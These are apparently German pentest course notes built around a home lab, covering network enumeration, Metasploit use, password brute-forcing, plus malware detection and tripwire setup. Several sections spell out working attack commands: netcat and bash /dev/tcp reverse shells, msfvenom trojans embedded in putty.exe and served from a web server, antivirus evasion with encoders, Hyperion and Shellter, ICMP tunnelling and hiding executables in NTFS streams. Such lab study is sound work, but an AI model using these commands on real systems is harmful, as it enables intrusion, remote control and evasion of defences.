Es werden Folgende Instanzen auf dem esxi benötigt:

• Kali → Dies wird das Arbeits-System
• Metasploitable 2 → Ein unsicheres System zum Scannen (Nicht im Internet sichtbar!)
• Win7 → System um Windows-Hacks zu testen (idealerweise ohne Updates)
• Win10 → um die Unterschiede zu Win7 zu zeigen
• Windows AD-Server für die AD und LDAP-Hacks
• Talis als Live CD → Livesystem um unerkannt im Internet Daten zu sammeln
• Aktueller Ubuntu Server → DAU-Server um Dienste scannen zu können

Um sowohl 32Bit wie auch 64Bit Systeme angreifen zu können muss auf Kali die wine 32Bit-Umgebung nachinstalliert werden:

dpkg --add-architecture i386 && apt update && apt install wine32 

Anmerkung: Ich verwende statt Kali lieber Parrot OS

• Installation:

   apt install tightvncserver 

• Konfiguration:

   nano ~/.vnc/xstartup 

  
  

#!/bin/sh
unset DBUS_SESSION_BUS_ADDRESS
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &
mate-session &
and just to be sure, we’ll make it executable

• Ausführbar machen:

   sudo chmod +x ~/.vnc/xstartup 

• Erster Start:

   vncserver 

• Auf dem Client:

   vncviewer 192.168.178.21:1 

| Installieren

apt-get install torbrowser-launcher

| Ausführen

torbrowser-launcher

^{Siehe: https://computingforgeeks.com/installing-tor-browser-on-linux-mint-ubuntu/}

Webseiten aus dem Darknet enden oft mit *.onion Diese Seiten findet man als Liste unter

• The hidden Wiki
• Uncensored Hidden Wiki
• TorLinks → Wiki Leaks

Tails: https://tails.boum.org/install/index.de.html

Unter Vulnerability Management versteht man eine Methode der immer wiederkehrenden Sicherheitsanalyse. Nachdem die Vorbereitungen einmal getroffen wurden und der Vulnerability-Assessment-Lifecycle eingerichtet ist, kann ein Pentest mit Auswertung und Fehlerbehebung stark automatisiert werden. Dazu sind nötig:

• Rollen und Verantwortungen der Mitarbeiter festlegen
• Was soll geprüft werden (Systeme, Dienste, Netzwerk)
• Welche Tools sollen verwendet werden
• Erstellen von SLAs uns Policies

Nachdem also festgelegt wurde wer was und womit getestet werden soll kann dies dokumentiert werden. So ist auch rechtlich der Pentest abgesichert.

In diesem Schritt erden die Scans durchgeführt, bewertet und ein Report erstellt

Die im Report dokumentierten Schwachstellen werden bewertet

• Höhe des Risiko
• Aufwand und Kosten der Behebung
• Mögliche Folgen der Behebung

Je nach Priorität werden die gefundenen Schwachstellen behandelt

• Hohes Risiko → Fehler schnell beheben
• Geringes Risiko → Können wir mit der Bedrohung leben?
• Hoher Aufwand → Können wir die Mittel den Fehler zu beheben beschaffen?
• Geringer Aufwand → Direkt umsetzten

Methoden: Host-Discovery → Portscan → Dienst und OS-Erkennung → Vulnerability-Scan

• Umgehen von Firewalls
• Banner Grabbing
• Einsatz von Proxies und Anonymisierer

Nmap Scripte
Pfad: /usr/share/nmap/scripts

Das Metasploit Framework

systemctl start postgresql     # Datenbank starten
systemctl enable postgresql    # Autostart der DB
msfdb init                     # Initiierung
msfconsole                     # msf Konsole starten
db_status                      # DB abfragen
workspace -a Lab               # Workspace anlegen
workspace                      # Workspaces listen
workspace -h                   # Zeigt die Hilfe für workspace

db_export -f xml /root/msfdb_backup     # erstellt ein db-Backup

msfconsole                     # startet msf
workspace Lab                  # In Workspace wechseln
show                           # Listet alle Module
show auxiliary                 # Zeigt Module einer Kategorie
search scanner                 # Sucht alle Scanningmodule

Ein Modul verwenden (hier: ssh_version)

use auxiliary/scanner/ssh/ssh_version   # Ein Modul zur Verwendung laden (info options)
  set rhosts <Ziel-IP>                  # Ziel setzten 
  run                                   # Start
  hosts                                 # Zeigt gefundene Hosts in der DB
  services                              # Zeigt gefundene Dienste in der DB
  

nmap verwenden

db_nmap -T4 -A -v 192.168.178.0/24      # Verwendet einen nmap-Scan und speichert Ergebnis in der msf-DB
db_nmap -sU -p161 192.168.178.0/24 --open     # SNMP-Agent Scan

Sploits suchen

searchsploit Local Priv | wc -l            # Zeigt Menge an gefundenen Treffer zu "Local Priv" Sploits   
searchsploit Local Priv |grep -i ubuntu    # Schränkt die Suche um Treffer mit "ubuntu" ein

nbtscan -r 192.168.178.0/24
enum4linux -v <Ziel-IP>x
nmap -p 139,445 --script "smb-enum*" <Ziel-IP>

nmap-Scripte für einen SNMP-Scan: ls /usr/share/nmap/scripts/ | grep snmp

nmap -sU -p 161 --script "snmp*" <Ziel-IP>

msf

use auxiliary/scanner/snmp/snmp_enum
options
set rhosts <Ziel-IP>

onesixtyone

vim community.list        # Datei mit SNMP Community-Strings erstellen
for ip in $(seq 1 254); do echo 192.168.178.$ip;done > ip_address-list    # IP Liste
onesixtyone -c community.list -i ip_address-list -d 

Zusatzmaterial: Konfiguration eines AD-Controller nmap

nmap -O -sV -p 389,636 --open <Ziel-IP>

jxplorer

apt install jxplorer     # Instalation on Kali
jxplorer                 # Startet das Tool

Email Enemaration

Via telnet Port 25 zum Mailserver verbinden
RCPT TO   = Recipient to
VRFY      = Verify
EXPN      = Expand

smtp-user-enum

erstelle Datei mailuser.txt  -> pro Zeile eine Mailadresse
smtp-user-enum -M VRFY -U mailuser.txt -t <Ziel-IP>

unter msf: db_nmap -sU -sS -p 53 <Ziel-Netz> --open

Zonentransfer

dnsrecon -n <Ziel-IP> -d <domainname>                                # Liest Zonentransfer Daten aus
dnsrecon -n <Ziel-IP> -r 192.168.178.1-192.168.178.254 -d fritz.box  # Liste aller bekannten Domain-Hosts

starte msf
use exploit/unix/ftp/vsftpd_234_backdoor
set rhost <Ziel-IP>
run

✔ Schneller umfassender Test
✔ Meist ist die Ausgabe gut aufbereitet
✔ Kann ohne tiefes Fachwissen ausgeführt werden
✘ Ein sehr „lauter“ Scan, der schnell auffällt
✘ Durch die Voreinstellung in der Regel wenig konfigurierbar
✘ Das Netz und die Dienste werden zum Teil hoch belastet → Gefahr von Ausfall
✘ Gefahr von falschen Aussagen die aufgrund der Automatisierung vorkommen können

nmap --script vuln <Ziel-IP>

Installation auf Ubuntu (https://www.xinux.net/index.php/GVM_Installation)
Installation auf Kali https://www.linuxmaker.com/linux/kali-linux-openvas.html und https://www.agix.com.au/installing-openvas-on-kali-in-2020/ Installation auf Ubuntuserver https://www.libellux.com/openvas/#configuration-files und https://pentestit.de/gvm-20-08-auf-ubuntu-server-20-04-installieren/

^{Anmerkung: GVM ist der Nachfolger von OpenVAS}

apt install gvm*
gvm-setup
gvm-check-setup
  WARNING: Your password policy is empty.
  SUGGEST: Edit the /etc/gvm/pwpolicy.conf file to set a password policy.

Passwort ändern:

gvmd --user=admin --new-password=<NeuesPasswort>

Post Install

vim  /etc/default/greenbone-security-assistant  
   GSA_PORT=9392
   

Start / Stop

gvm-start
gvm-stop

Der Dienst ist unter https://127.0.0.1:9392 erreichbar. Login mit erstelltem User
Firefox remote verwenden:

ssh -C -Y username@servername -> Login mit PW
firefox 127.0.0.1:9392

Firewall aktivieren:

apt-get install ufw
  ufw enable
  ufw allow 80
  ufw allow 9392
  ufw allow 22
  

use auxiliary/scanner/postgres/postgres_login
set RHOSTS <Ziel-IP>
run

postgres_login anpassen, wenn Passwörter bekannt sind

show options
PASS_FILE  -> Dateipfad merken und Datei mit bekannten PW ergänzen
              Im Ordner der Datei sind mehrere Dateien anderer Default-Passwort-Listen
USER_FILE  -> Dateipfad merken und Datei mit bekannten User ergänzen

How it works: medusa -M smtp -q

Vorbereitung:

• Liste mit bekannten mailadressen (txt, pro Zeile eine Mailadresse) → user.list
• Liste mit warscheinlichen Passwörter (txt, pro Zeile ein Passwort) → pass.list

Starte

medusa -h <smtp-Mailserver FQDN> -U user.list -P pass.list -s -M smtp

hydra -l Nutzer – P Passwortliste.txt ftp://192.168.0.1
xhydra startet die GUI

Siehe: https://www.gonicus.de/aktuelles/20181219-netcat/

ncat -lp 4444        # Startet netcat als Server auf Port 4444

unter Kali die Datei /usr/share/windows-binaries/nc.exe auf einen Winows-PC kopieren und in der cmd ausführen.

nc <SERVER-IP> 4444 # startet einfache Verbindung

Datei mit nc übertragen

  c:\nc>nc -nlvp > wget.exe 4444    # startet nc als Server unter Port 4444, schreibt aber den std Out in die Datei wget.exe
  nc <Server-IP> 4444 <  /usr/share/windows-binaries/wget.exe   # nc auf Kali starten und die Datei wget.exe übertragen

ncat -nlvp 4444 -e /bin/bash      # startet nc und piped /bin/bash darüber
c:\nc>nc <Server-IP> 4444         # startet nc auf Windows und stellt so die Shell des Servers zur Verfügung
 
c:\nc>nc -nlvp 4444 -e cmd.exe    # startet nc auf Windows und piped cmd.exe
ncat <Server-IP> 4444             # startet nc auf Linix und stellt die cmd des Servers zur Verfügung

ncat -nlvp 443                    # startet einen Listener auf dem Server
ncat -nv <Server-IP> -e /bin/bash # startet auf dem Client nv und tunnelt eine bash durch den Port 443 zum Server
 
bash -i >& /dev/tcp/<Server-IP>/443 0>&1   # startet eine Shell und tunnelt sie zur Server-IP Port 443

msf starten und in den passenden Workspace wechseln 
Falls vorhanden in den vuls nach distcc suchen (vulns)
Nach einer passenden Exploit suchen (search distcc)
Exploit verwenden (use exploit/unix/misc/distcc_exec)
RHOST setzen (set RHOST <Client-IP>)
Payload setzten (set PAYLOAD cmd/unix/reverse_bash)
ausführen (exploit)

Erstellen des Trojaner um aud einem Windows-Zielsystem eine meterpreter-Shell zu starten die sich zu unserem Server verbindet

msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.178.124 LPORT=443 -f exe -o mp_shell.exe
  LHOST= IP des Kali Angreifer
  LPORT= Port der Komunikation (muss an der FW offen sein)
  -f   = Art der Ergebnisdatei
  -o   = Name der Ergebnisdatei

Trojaner zB auf einem Webserver zur Verfügung stellen.
Auf Kali eine msfconsole mit Multihandler starten

msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_https    # Nutzt das https Payload
set lhost <eigene-IP>
set lport 443  
exploit

Jetzt kann die Datei auf dem Windows-Ziel gestartet werden. In der meterpreter-Shell wird eine neue Shell (von Windows) angezeigt.
Anmerkung: Einfacher geht es mit SET: Bypass Windows Defender and Fake image for Reverse shell

Externe Module nachladen: load (2xtab)

mit SET: how to create obfuscate Virus inside Microsoft Word Document

1. Carrier Applikation bereitstellen. Dies ist eine Applikation in der der Trojaner eingebaut werden soll.

msfvenom -p windows/meterpreter_reverse_tcp LMHOST=192.168.178.124 LPORT=8080 -x /hom/home/andre/putty.exe -k -f exe -o /var/www/html/putty2.exe

• -p definiert den Payload → eine TCP reverse Shell auf Windows
• LMHOST ist die vom Ziel erreichbare IP des Kali
• LPORT ist der zur Kommunikation eingesetzte Port
• -x welcher Carrier (32Bit) wird bereit gestellt
• -k Der Carrier soll auch ausgeführt werden (ohne k wird nur der Trojaner aktiviert)
• -f Die Output-Datei soll einene exe sein
• -o Ziel der Output-Datei (idealerweise gleich der Webserver, zur einfachen Verbreitung)

2. Meterpreter-Session auf Kali starten

msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST 192.168.178.124
set LPORT 8080
run

3. Trojaner auf Zielsystem bereitstellen und ausführen Wird putty auf Windows ausgefüher, statet zusätzlich eine rev. Shell. Diese beendet sich aber wenn putty geschlossen wird. Daher muss die Shell jetzt an ein andese Programm gehängt werden.

4. Von putty auf „explorer“ umhängen

ps -S explorer      # Die PID von explorer finden -> hier 336
migrate 336

Jetzt steht eine Shell zum Zielsystem zur Verfügung

Methoden der Tarnung:

• Encoder verändern den Binärcode
• Packer zum komprimieren, dekomprimieren sich bei Ausführung selbstständig
• Crypter verschlüsseln
• Embedder und Wrapper betten den Schadcod in ein harmloses Programm ein
• Customized Code ist selbst geschriebener Code, dessen Signatur noch nicht bekannt ist

msfvenom -l encoder

Verwenden wir als Beispiel „Shikata ga nai“

msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.178.124 LPORT=443 -f exe -e x86/shikata_ga_nai -i 130 -o /var/www/html/putty_shi.exe
* Bekannter Befehl um in putty einen Trojaner zu betten
* -e Auswahl des Encoders
* -i Anzahl an Iterationen

Mehrere Encoder nacheinander verwenden

msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.178.124 LPORT=443 -f exe -e x86/countdown .i 10 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 130 -o double-ent.exe
* Verwendet zuerst den Encoder countdown mit 10 Iterationen und danach shikata mit 130 Iterationen
* Datei wird als double-ent.exe lokal gespeichert

Fazit: Encoder sind nicht sehr hilfreich um an Virenscanner vorbei zu kommen. Selbst der Einsatz von mehreren Encodern bringt nicht viel.

Die 32Bit-Umgebung von wine muss installiert sein (Siehe Vorbereitungen)

cd /usr/share/windows-resources/hyperion
wine hyperion.exe /var/www/html/putty2.exe /var/www/html/putty-crypt.exe

Fazit: Hyperion ist altbekannt und wird fast immer als Virus erkannt.

apt install shellter   # Geht nicht auf Kali, dafür auf Parrot schon installiert

Operation-Mode: A
PE Target     : Der Pfad zur *.exe die infiziert werden soll 

Alle weiteren Eingaben sind selbsterklärend. Das Ergebnis steht dann in dem Ordner /usr/share/windows-resources/shellter/ zur Verfügung. Unter /usr/share/windows-resources/shellter/Shellter_Backups findet man ein Backup der nicht infizierten Originaldatei. Fazit: Weniger als die Hälfte der Virenscanner erkennen diese Datei als Virus

• Kernel Rootkits (LKM) Laden sich als Modul in den Kernel nach und manipulieren Systemaufrufe
• Userland Rootkits verwenden manipulierte DLL die über eine API eines Programms dessen Funktion ändern oder erweitern

Arbeiten auf allen Clients

apt install gcc git make
cd opt
git clone https://github.com/DhavalKapil/icmptunnel
make

Am Server (Kali)

cd /op7/icmptunnel
./icmptunnel -s 10.0.1.1    # Immer diese IP angeben das ist die ICMP-Router-IP
ifconfig                    # taucht eine tun auf, läuft der Server

Auf dem Ziel

vim /opt/icmptunnel//client.sh
# route add -host <server> gw <gateway> dev <interface    # Zeile auskommentieren
./icmptunnel -c <Kali-IP>

Ab jetzt wird die Kommunikation zwischen der Servern als ICMP-Pakete getarnt

Für Windows NTFS: Daten an harmlosen Dateien anhängen und so verstecken.

Textdatei erstellen: harmlos.txt und speichern
cmd starten und in das Verzeichnis der eben erstellten Datei wechseln
notepad harmlos.txt:geheim.txt  -> Die Datei geheim.txt wird erstellt und kann bearbeitet werden

Die neue Datei geheim.txt ist nirgendwo zu sehen. Auch hat sich der Inhalt von harmlos.txt nicht geändert. Mit dem Befehl

notepad harmlos.txt:geheim.txt

kann wieder auf den versteckten Inhalt zugegriffen werden. Das geht auch mit ausführbaren Inhalt

type c:\ordner\ virus.exe c:\ordner\harmlos.txt:virus.exe
start harmlos.txt:virus.exe        # führt virus.exe aus
dir -r                             # zeigt Ordnerinhalt inklusive ADS (ab Win 7)

• LogKeys für Linux
• Keylogger in Python schreiben

Programm dekompilieren und Quellcode analysieren oder nach Ausrücken im Code suchen mit den Tools:

• strings (Windows für die CMD)
• pestudio (Windows mit GUI)

Verhalten eines Sample (Schad-Programm) in Echtzeit beobachten. Dies muss in einer Sandbox durchgeführt werden.

• JOESandbox
• AnyRun

Auf Windows-Clients muss geprüft werden:

• Virencheck
  • Offline via Rescue-Disk (zB Kasperky Rescue Disk)
  • Antivirus-Tools testen mit dem eicar-String
    • X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
    • oder mit auf der eicar Homepage vorgefertigten Dateien
• Prozessaktivitäten
  • Taskmanager aufrufen und die Spalten Prozessname und Begehlszeile hinzu fügen
  • Der Process-Explorer. Er kann Prozesse mit Virus-Total Checken
  • Der Process-Monitor gibt weitere Auskünfte über laufende Prozesse
• Netzwerkaktivitäten
  • netstat -nap tcp für die CMD
  • Als Admin eine CMD starten und netstat -nabp tcp → zeigt auch die zugehörigen Prozesse
  • unter Linux: netstat -tlpn
  • Besser ist es ein externes Tool zu verwenden wie zB Nirsoft currports
  • DNS und die Datei hosts checken. Dazu eignet sich das Tool Query Sniffer an
• Windows Registry
  • Der Reg Scanner ist eine bessere Alternative als regedit
  • regshot erstellt einen Snapshot der Registry. Danach können weitere Shots mit der Referenz verglichen werden.
• Autostart-Einträge
  • Taskmanager
  • Bessere Alternative: Autoruns zusammen mit Process-Explorer
• Windows Dienste
  • services.msc
  • Alternative: http://foxplanet.de/ → Service Manager
• Treiber
  • msinfo.exe
  • Bessere alternative: Driver View
• Integrität und Signaturen
  • sigverif in einer CMD ausführen
• Einsatz von Sniffer
  • Der Sniffer Malwarebites zeigt PUP und PUA an und kann diese reparieren (gibt es auch für Android)
  • Der HijackThis überprüft ob Betriebssystem-Einstellungen von Malware geändert wurden.

apt install tripwire
tripwire --init
vim /etc/tripwire/twpol.txt
  # /var/run
  # /var/log
  # /root/.* (außer bashrc bash_* und ICE*)
  # /proc
twadmin -m P /etc/tripwire//twpol.txt
tripwire --init
tripwire --check

Entsprechend der Fehler muss die twpol.txt angepasst werden. Danach kleines Script schreiben um via Cronjob das Ergebnis zu mailen

Ein System (idealerveise eine VM) die mit üblichen Monitoring und Sicherheits-Tolls ausgestattet ist. In dieser vom Firmennetz abgetrennten Stand-Alone Maschine können Daten und Programme getestet werden ohne das Produktivsysteme beeinflusst werden können.
Siehe: http://sheepdip.sourceforge.net/

• Für Windows: Sandboxie
• Für Linux: FireJail Hier ein HowTo
• Für VM: Cuckoo

Linguistische Steganografie ist das Verstecken einer Botschaft innerhalb eines Textes. Siehe: https://www.spammimic.com/encode.shtml
Die technische Steganografie nutzt das Verstecken von digitalem Inhalt in unauffälligen Medien wie zB Bilder oder Musikdateien.

Dazu verwendet man das letze Bit der Farbinformation jedes Pixel. Dadurch verringert sich der Farbraum um ca 10%, was nicht auffällt. Dabei ergeben 3 RGB-Pixel ein 8-Bit-Zeichen. Siehe:

• OpenStego für Windows und Linux
• Steghide
• stegosuite

stegosuite -e -f <Geheime.Datei> -k <passwort> <Bild.jpg> # Der Payload darf je nach Bildgröße nicht zu groß gewählt werden
stegosuite x <Bild.lpg> -k <passwort>  # Extrahiert die Datei 

Hier gibt es weitere Infos: https://www.blackmoreops.com/2017/01/11/steganography-in-kali-linux-hiding-data-in-image/

• StegoStick